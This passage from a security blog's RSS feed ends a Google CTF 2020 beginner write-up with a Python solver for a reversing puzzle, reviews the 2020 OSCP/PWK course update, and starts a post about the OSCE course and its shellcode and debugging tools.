	&lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;shuffled&lt;/span&gt;
	

&lt;span class=&quot;k&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;add32&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;shuffled&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;
	&lt;span class=&quot;n&quot;&gt;toBytes&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;int&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;binascii&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;hexlify&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;shuffled&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;encode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&apos;utf8&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)),&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;16&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;n&quot;&gt;leet&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;mh&quot;&gt;0x6763746613371337fee1deaddeadbeef&lt;/span&gt;
	&lt;span class=&quot;n&quot;&gt;multiple1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;wordify&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;toBytes&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;n&quot;&gt;multiple2&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;wordify&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;leet&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
	
	&lt;span class=&quot;n&quot;&gt;sum32&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;
	
	&lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;m&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;range&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;
		&lt;span class=&quot;n&quot;&gt;sum32&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+=&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;multiple1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;m&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;multiple2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;m&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;96&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;32&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;m&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;amp;&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mh&quot;&gt;0xffffffff&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;96&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;32&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;m&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)))&lt;/span&gt;	
	&lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;sum32&lt;/span&gt;	
	
&lt;span class=&quot;k&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;xor&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;sum32&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;
	&lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;mh&quot;&gt;0xaaf986eb34f823d4385f1a8d49b45876&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;^&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;sum32&lt;/span&gt;
	
&lt;span class=&quot;c1&quot;&gt;# Break large int into 32-bit words
&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;wordify&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;largeInt&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;
	&lt;span class=&quot;n&quot;&gt;bits&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;mh&quot;&gt;0xffffffff&lt;/span&gt;
	&lt;span class=&quot;n&quot;&gt;word1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;largeInt&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;96&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;amp;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;bits&lt;/span&gt;
	&lt;span class=&quot;n&quot;&gt;word2&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;largeInt&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;64&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;amp;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;bits&lt;/span&gt;
	&lt;span class=&quot;n&quot;&gt;word3&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;largeInt&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;32&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;amp;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;bits&lt;/span&gt;
	&lt;span class=&quot;n&quot;&gt;word4&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;largeInt&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;amp;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;bits&lt;/span&gt;
	&lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;word1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;word2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;word3&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;word4&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;
	
&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;__name__&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;__main__&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
	&lt;span class=&quot;nb&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;main&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;())&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;&lt;em&gt;Note: While input is 15 characters, the operations are done using 16 characters. Adding a null-byte to the input remedies this.&lt;/em&gt;&lt;/p&gt;
</description>
        
          <description>&lt;p&gt;&lt;em&gt;A short writeup for one of the first challenges for Google CTF 2020&lt;/em&gt;&lt;/p&gt;

</description>
        
        <pubDate>Mon, 24 Aug 2020 00:00:00 +0000</pubDate>
        <link>https://basicinfosecurity.github.io//blog/Google-CTF-2020-beginner/</link>
        <guid isPermaLink="true">https://basicinfosecurity.github.io//blog/Google-CTF-2020-beginner/</guid>
        
        
      </item>
      
    
      
      <item>
        <title>PWK Update 2020</title>
        <description>&lt;p&gt;&lt;em&gt;If you want to know my experience before the update, see my bloviations &lt;a href=&quot;https://basicinfosecurity.github.io//blog/OSCP-and-Me&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

&lt;h3 id=&quot;a-look-back&quot;&gt;A Look Back&lt;/h3&gt;

&lt;p&gt;If you’ve ever read reviews on Offsec’s courses, you’ve probably come across several saying they’re &lt;a href=&quot;https://community.infosecinstitute.com/discussion/134006/interesting-article-it-s-time-to-move-on-from-offensive-security-certifications&quot; target=&quot;_blank&quot;&gt;“outdated”&lt;/a&gt;, &lt;a href=&quot;https://www.reddit.com/r/AskNetsec/comments/4uzril/pwkoscp_is_not_for_new_people/&quot; target=&quot;_blank&quot;&gt;“not for new people”&lt;/a&gt;, and they’re the &lt;a href=&quot;https://infosec.exchange/@tnkr/100807652073155230&quot; target=&quot;_blank&quot;&gt;“new CEH”&lt;/a&gt; (The last one might be confusing as CEH is usually recommended as an alternative due to PWK’s difficulty). There were also allegations of cheating that gained traction around 2018 and culminated in the implementation of &lt;a href=&quot;https://www.csoonline.com/article/3336068/oscp-cheating-allegations-a-reminder-to-verify-hacking-skills-when-hiring.html&quot; target=&quot;_blank&quot;&gt;proctored exams&lt;/a&gt; by early 2019 due to an exam leak.&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/cyb3rsick_ihelped.jpg&quot; /&gt;&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;em&gt;A disgruntled student&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;While public perception of the courses was positive, it gradually soured. OSCP holders have had a lead over other entry-level certifications. As a comparison, in the US the &lt;a href=&quot;https://www.payscale.com/research/US/Certification=Offensive_Security_Certified_Professional_(OSCP)/Salary&quot; target=&quot;_blank&quot;&gt;average salary&lt;/a&gt; of a pentester with CEH is $91,000 while the average salary for an OSCP holder is $97,000. Granted, CEH holders have an edge in flexibility, as the overall average salary across multiple cybersecurity roles is slightly higher than that of OSCP holders, but it’s clear that if you want to be well-paid as a pentester, you must go for OSCP. Moreover, a new role has become more relevant: the &lt;a href=&quot;https://twitter.com/hashtag/redteam&quot; target=&quot;_blank&quot;&gt;#RedTeamer&lt;/a&gt;. &lt;a href=&quot;https://twitter.com/hashtag/redteam&quot; target=&quot;_blank&quot;&gt;#RedTeam&lt;/a&gt; roles have been on the rise and more course offerings are put out to help fill the skills gap, something PWK lacked at the time. As demand for OSCP holders grew, they also received more scrutiny. The reputation of the courses, the brand Offsec has been building up, and the credibility of cert holders were put into question. The proctored exams were a step in the right direction but there was still a long way to go.&lt;/p&gt;

&lt;h3 id=&quot;gruntling-the-disgruntled&quot;&gt;Gruntling the Disgruntled&lt;/h3&gt;
&lt;p&gt;On February 11, 2020, Offsec announced the update &lt;sup id=&quot;fnref:1&quot; role=&quot;doc-noteref&quot;&gt;&lt;a href=&quot;#fn:1&quot; class=&quot;footnote&quot; rel=&quot;footnote&quot;&gt;1&lt;/a&gt;&lt;/sup&gt; &lt;sup id=&quot;fnref:2&quot; role=&quot;doc-noteref&quot;&gt;&lt;a href=&quot;#fn:2&quot; class=&quot;footnote&quot; rel=&quot;footnote&quot;&gt;2&lt;/a&gt;&lt;/sup&gt;. The responses were mixed:&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/cool2.png&quot; /&gt;
&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/justenrolled2.png&quot; /&gt;
&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/wrongo.png&quot; /&gt;
&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/payharder.png&quot; /&gt;
&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;em&gt;Joe needs to calm down.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The confusion was understandable. The change was communicated poorly; there was little to no announcement of the plans for the update in any of their channels to existing students. Their social accounts made no mention of the upgrade up until the announcement. It could have been posted in the student forums and it would be just as effective.&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/gimmedatawae.jpg&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;Oddly enough, it fits Offsec’s “style”. They’ll dump the details on you and you do the research (#TryHarder indeed, right Joe?). This is not the first time they have upgraded their course. To think that after several upgrades, they would fumble such important news.&lt;/p&gt;

&lt;h3 id=&quot;the-update&quot;&gt;The Update&lt;/h3&gt;

&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/stanczyk_scaled.jpg&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;If you haven’t read up on the changes yet, you can go through &lt;a href=&quot;https://www.offensive-security.com/offsec/pwk-2020-update/&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt; and &lt;a href=&quot;https://www.offensive-security.com/pwk-oscp/&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;. But if you’re a returning student, what changed?&lt;/p&gt;

&lt;p&gt;&lt;em&gt;In a nutshell:&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Most of the Windows and *nix machines were upgraded.&lt;/li&gt;
  &lt;li&gt;PowerShell is now viable and highly significant.&lt;/li&gt;
  &lt;li&gt;Active Directory attacks are now possible.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;em&gt;Also:&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;The machines increased from ~50 to ~70 (excluding the Sandbox/Poultry network).&lt;/li&gt;
  &lt;li&gt;The Big 4 are no more. There is now the Big 5.&lt;/li&gt;
  &lt;li&gt;Due to infrastructure upgrades, some attacks and methods on legacy technology (e.g. snmp cracking) are no longer possible.&lt;/li&gt;
  &lt;li&gt;The materials are now “new people friendly”.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Kudos to Offsec! They made the labs more engaging and more challenging than ever before. The upgrade to the latest Windows version modernized the lab environment, bringing it closer to how corporate environments are designed. This also made PowerShell more significant and a great boon. In the past, PowerShell was rare and barely usable. It’s now one of my favorite tools and attack surfaces (&lt;a href=&quot;https://twitter.com/hashtag/redteam&quot; target=&quot;_blank&quot;&gt;#RedTeam&lt;/a&gt;). The upgrades also revived old machines. They have touted:&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;… The new version of PWK contains more than double the content and 33% more lab machines.&lt;/em&gt;&lt;sup id=&quot;fnref:3&quot; role=&quot;doc-noteref&quot;&gt;&lt;a href=&quot;#fn:3&quot; class=&quot;footnote&quot; rel=&quot;footnote&quot;&gt;3&lt;/a&gt;&lt;/sup&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;And they certainly delivered. They toned down the “CTF-style” boxes and revamped the old ones to require new approaches. This needed sharpening of old skills, learning new ones and adding new tools to your arsenal. Combining both revamps and new machines, I’d say there’s easily 50% new machines (practically speaking). Some of the “Big 4” got nerfed. New and more difficult machines usurped their place to form the “Big 5”. As most of the new machines were added to the Public network, there’s more than enough activities there to keep you engaged. Besides these, there are other subtle changes to the labs for students to discover.&lt;/p&gt;

&lt;p&gt;In the past, I didn’t bother much with the web player which came with the videos. Now it’s easier to play them anywhere, anytime (mobile friendly and supports dark mode!). The course guide is easier to follow but remains challenging: it walks you through the attacks as you perform them in the Sandbox environment (to be honest, I just skimmed through them). Customer support is quicker and better but could be improved. They junked the reservation system. No more waiting for slots to open! Upon registration, you get your labs the next day and your materials only a few hours after payment. For inquiries it used to take more than a day just to get a reply, but now you can expect a quicker turnaround.&lt;/p&gt;

&lt;h3 id=&quot;wait&quot;&gt;Wait!&lt;/h3&gt;
&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/beforeyoubuy_oscp.png&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;Should you upgrade? No.&lt;/p&gt;

&lt;p&gt;I thought there could be some wiggle room here but this quote stuck out to me:&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;There is no requirement from OffSec to update your certification – once an OSCP, always an OSCP.&lt;/em&gt; &lt;sup id=&quot;fnref:4&quot; role=&quot;doc-noteref&quot;&gt;&lt;a href=&quot;#fn:4&quot; class=&quot;footnote&quot; rel=&quot;footnote&quot;&gt;4&lt;/a&gt;&lt;/sup&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Certainly, there is value in the course but if you’re certified, why bother? The update, while welcome, can be sought elsewhere and this rings more true as courses increase in quality and quantity. It is only important insofar as it keeps the course fresh. If you bought the course shortly before the update, there might be cause to get it. But considering the price is $200, it’s pretty steep, especially considering expenses on courses and exams are planned out in advance, something students were clearly unprepared for. While the labs offer some &lt;a href=&quot;https://twitter.com/hashtag/redteam&quot; target=&quot;_blank&quot;&gt;#RedTeaming&lt;/a&gt; exercises, you can arguably get better value from other courses for lower fees. It’s tempting to think the upgraded PWK is comparable to other &lt;a href=&quot;https://twitter.com/hashtag/redteam&quot; target=&quot;_blank&quot;&gt;#RedTeaming&lt;/a&gt; courses but upon closer look, it’s more of an introductory course.&lt;/p&gt;

&lt;h3 id=&quot;wrapping-up&quot;&gt;Wrapping up&lt;/h3&gt;
&lt;p&gt;While the PWK 2020 experience was enjoyable, I had some reservations. PWK still delivers value just as it always did but it received an upgrade a little late, with competitors already overtaking them (I am purposely leaving out these other courses as I don’t want to get into the comparison). For the student, if you have time and money, maybe this upgrade is for you. If you have both and are already certified, save (unless you’re in it for nostalgia). You’re not at a loss by buying the upgrade, but you can do better elsewhere. Your job prospects remain the same regardless of whether you’re certified through PWB v2.0/PWB v3.0/PWK/PWK 2020. To repeat Offsec, &lt;em&gt;“Once an OSCP, always an OSCP”&lt;/em&gt;. OSCP has already opened many doors to many professionals and carried many further into their careers. I will close with this:&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;In recent weeks I have been reading comments online about the Penetration Testing with Kali Linux (PWK) course and OSCP exam taking a lot of flak for being “too old” and using “outdated exploits that don’t even work anymore.”… But that is beside the point. The PWK and OSCP exam are all about teaching you how to think, solve problems, persevere, and develop a pentesting methodology that works for you.&lt;/em&gt; &lt;sup id=&quot;fnref:5&quot; role=&quot;doc-noteref&quot;&gt;&lt;a href=&quot;#fn:5&quot; class=&quot;footnote&quot; rel=&quot;footnote&quot;&gt;5&lt;/a&gt;&lt;/sup&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;div class=&quot;footnotes&quot; role=&quot;doc-endnotes&quot;&gt;
  &lt;ol&gt;
    &lt;li id=&quot;fn:1&quot; role=&quot;doc-endnote&quot;&gt;
      &lt;p&gt;&lt;a href=&quot;https://twitter.com/offsectraining/status/1227242809805066240&quot; target=&quot;_blank&quot;&gt;@offsectraining (Offensive Security). “So…you know that PWK update everyone’s been asking for? IT’S HERE! We’ve overhauled the prep course for the OSCP exam, adding more than 2x the content and 33% more lab machines. Get info plus FAQs in this blog post: https://hubs.ly/H0mZzFL0” Twitter, 11 Feb. 2020&lt;/a&gt; &lt;a href=&quot;#fnref:1&quot; class=&quot;reversefootnote&quot; role=&quot;doc-backlink&quot;&gt;&amp;#8617;&lt;/a&gt;&lt;/p&gt;
    &lt;/li&gt;
    &lt;li id=&quot;fn:2&quot; role=&quot;doc-endnote&quot;&gt;
      &lt;p&gt;&lt;a href=&quot;https://www.facebook.com/offsec/photos/a.1005384106165595/2760935590610429/&quot; target=&quot;_blank&quot;&gt;Offensive Security. So…you know that PWK update everyone’s…. Facebook, 11 Feb. 2020&lt;/a&gt; &lt;a href=&quot;#fnref:2&quot; class=&quot;reversefootnote&quot; role=&quot;doc-backlink&quot;&gt;&amp;#8617;&lt;/a&gt;&lt;/p&gt;
    &lt;/li&gt;
    &lt;li id=&quot;fn:3&quot; role=&quot;doc-endnote&quot;&gt;
      &lt;p&gt;&lt;a href=&quot;https://www.offensive-security.com/offsec/pwk-oscp-faq/&quot; target=&quot;_blank&quot;&gt;Offensive Security. “PWK &amp;amp; OSCP Frequently Asked Questions” The Offsec Blog, 11 Feb 2020&lt;/a&gt; &lt;a href=&quot;#fnref:3&quot; class=&quot;reversefootnote&quot; role=&quot;doc-backlink&quot;&gt;&amp;#8617;&lt;/a&gt;&lt;/p&gt;
    &lt;/li&gt;
    &lt;li id=&quot;fn:4&quot; role=&quot;doc-endnote&quot;&gt;
      &lt;p&gt;&lt;a href=&quot;https://www.offensive-security.com/offsec/pwk-2020-update/&quot; target=&quot;_blank&quot;&gt;Offensive Security. “PWK: All New for 2020” The Offsec Blog, 11 Feb 2020&lt;/a&gt; &lt;a href=&quot;#fnref:4&quot; class=&quot;reversefootnote&quot; role=&quot;doc-backlink&quot;&gt;&amp;#8617;&lt;/a&gt;&lt;/p&gt;
    &lt;/li&gt;
    &lt;li id=&quot;fn:5&quot; role=&quot;doc-endnote&quot;&gt;
      &lt;p&gt;&lt;a href=&quot;https://www.willchatham.com/general/thoughts-on-oscp-being-outdated/&quot; target=&quot;_blank&quot;&gt;Chatham, Will. “Thoughts on OSCP being ‘outdated’”, Will Chatham (blog), 31 Aug 2019&lt;/a&gt; &lt;a href=&quot;#fnref:5&quot; class=&quot;reversefootnote&quot; role=&quot;doc-backlink&quot;&gt;&amp;#8617;&lt;/a&gt;&lt;/p&gt;
    &lt;/li&gt;
  &lt;/ol&gt;
&lt;/div&gt;
</description>
        
          <description>&lt;p&gt;&lt;em&gt;If you want to know my experience before the update, see my bloviations &lt;a href=&quot;https://basicinfosecurity.github.io//blog/OSCP-and-Me&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
        
        <pubDate>Thu, 04 Jun 2020 00:00:00 +0000</pubDate>
        <link>https://basicinfosecurity.github.io//blog/OSCP-2020-Update-Review/</link>
        <guid isPermaLink="true">https://basicinfosecurity.github.io//blog/OSCP-2020-Update-Review/</guid>
        
        
      </item>
      
    
      
      <item>
        <title>OSCE and Me</title>
        <description>&lt;p&gt;&lt;em&gt;So it’s time for that yearly blog update. I hope to maintain this consistency throughout the lifetime of this blog.&lt;/em&gt;&lt;/p&gt;

&lt;h3 id=&quot;catching-up&quot;&gt;Catching-up&lt;/h3&gt;
&lt;p&gt;The beginning of the year brought exciting changes to my career: A new role and a lot more time. This was perfect as there’s a lot of catching-up with the backlog of reading materials and planned trainings.&lt;/p&gt;

&lt;p&gt;Last year was tough. Work kept me from immersing in my studies; the spare time between commutes and the few moments of downtime were spent reading. But no sapling ever grew to awesome heights with specks of sunlight and drops of dew. And so I resolved to change my predicament and looked for another job.&lt;/p&gt;

&lt;p&gt;After settling-in, I attempted the &lt;a href=&quot;http://fc4.me/&quot;&gt;CTP Registration Challenge&lt;/a&gt;. While not going in stark blind, I can’t say I knew what I was doing at the time. The challenge was quite interesting and can be solved by tinkering and being “curious” of what’s under the hood.&lt;/p&gt;

&lt;h3 id=&quot;the-course&quot;&gt;The Course&lt;/h3&gt;
&lt;p&gt;The course is quite short: A month of lab time, and dedicating maybe 30 minutes to an hour every day is enough to finish it. The syllabus can be viewed as the list of the few exercises to accomplish. There are no extra exercises to attempt (unlike OSCP but more on this later). For practice, you can follow some guides out there, look for exploits in &lt;a href=&quot;https://www.exploit-db.com/&quot;&gt;exploit-db&lt;/a&gt; or find vulnerabilities on your own (the former is more practical). Building a lab environment is feasible, and the concepts from each exercise are portable so things can be done at your own pace.&lt;/p&gt;

&lt;p&gt;The materials are easy to follow, though some topics were lacking (e.g. alphanumeric encoding). There are excellent supplementary guides from &lt;a href=&quot;https://www.corelan.be/&quot;&gt;Corelan&lt;/a&gt; &amp;amp; &lt;a href=&quot;https://www.securitysift.com/&quot;&gt;SecuritySift&lt;/a&gt; that expand on the syllabus. They’re lengthy and best studied while following along. The distro of choice is &lt;a href=&quot;https://www.backtrack-linux.org/&quot;&gt;the old Backtrack&lt;/a&gt; but any other is fine, even for the exam (&lt;a href=&quot;https://www.parrotsec.org/&quot;&gt;Parrot OS&lt;/a&gt; is a great choice). A lot of time was spent wrestling to replicate exploits locally. Sometimes it can be done with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;wine&lt;/code&gt; but it is still best to keep a Windows VM handy.&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/93px-WINE-logo.png&quot; /&gt;
&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;&lt;a href=&quot;https://wiki.winehq.org/Main_Page&quot;&gt;WINE&lt;/a&gt; Is Not an Emulator. It’s not a miracle either.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Throughout the course, I relied heavily on &lt;a href=&quot;https://github.com/radare/radare2&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;radare2&lt;/code&gt;&lt;/a&gt;, &lt;a href=&quot;https://r2wiki.readthedocs.io/en/latest/home/radare2-tools/&quot;&gt;radare2 tools&lt;/a&gt; (i.e. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rasm2&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rax2&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ragg2&lt;/code&gt;) and Python. Learning &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;r2&lt;/code&gt; during the course was a great boon and since then it is part of my toolset.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;A word of caution: while &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;r2&lt;/code&gt; might be great, it can be pretty unreliable. Modifying files can be dodgy. For your sanity, refrain from using that feature (until they fix &lt;a href=&quot;https://github.com/radare/radare2/issues/2738&quot;&gt;this&lt;/a&gt;). I think I grew some wrinkles, in visible and non-visible places, trying to make it work.&lt;/em&gt;&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/black-rotten-banana-isolated-over-white-background-stock-photography_csp14303409.jpg&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://nets.ec/Assembly&quot;&gt;Assembly language&lt;/a&gt; is heavily used so it’s best to have references handy. The folks over at nets.ec have this &lt;a href=&quot;https://nets.ec/Ascii_shellcode&quot;&gt;great wiki&lt;/a&gt; to aid in writing shellcode, especially when encoding to Alphanumeric/ASCII. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rasm2&lt;/code&gt; is useful as well:&lt;/p&gt;

